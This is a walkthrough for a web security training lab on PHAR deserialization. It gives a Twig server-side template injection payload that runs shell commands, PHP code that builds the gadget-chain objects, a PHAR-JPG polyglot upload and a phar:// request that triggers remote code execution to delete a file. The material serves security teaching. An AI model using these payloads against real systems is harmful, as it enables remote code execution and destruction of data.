This lab does not explicitly use deserialization. However, if you combine PHAR deserialization with other advanced hacking techniques, you can still achieve remote code execution via a custom gadget chain.
To solve the lab, delete the morale.txt file from Carlos's home directory.
You can log in to your own account with the following credentials: wiener:peter
Observe that the website has a feature for uploading your own avatar, which only accepts JPG images. Upload a valid JPG as your avatar. Notice that it is loaded using GET /cgi-bin/avatar.php?avatar=wiener.
In Burp Repeater, request GET /cgi-bin to find an index that shows a Blog.php and CustomTemplate.php file. Obtain the source code by requesting the files using the .php~ backup extension.
Study the source code and identify the gadget chain involving the Blog->desc and CustomTemplate->lockFilePath attributes.
Notice that the file_exists() filesystem method is called on the lockFilePath attribute.
Notice that the website uses the Twig template engine. You can use deserialization to pass in an server-side template injection (SSTI) payload. Find a documented SSTI payload for remote code execution on Twig, and adapt it to delete Carlos's file: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}
Write a some PHP for creating a CustomTemplate and Blog containing your SSTI payload: class CustomTemplate {}
class Blog {}
$object = new CustomTemplate;
$blog = new Blog;
$blog->desc = '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}';
$blog->user = 'user';
$object->template_file_path = $blog;
Create a PHAR-JPG polyglot containing your PHP script. You can find several scripts for doing this online (search for "phar jpg polyglot"). Alternatively, you can download our ready-made one.
Upload this file as your avatar.
In Burp Repeater, modify the request line to deserialize your malicious avatar using a phar:// stream as follows: GET /cgi-bin/avatar.php?avatar=phar://wiener
Send the request to solve the lab.
Want to track your progress and have a more personalized learning experience? (It's free!)
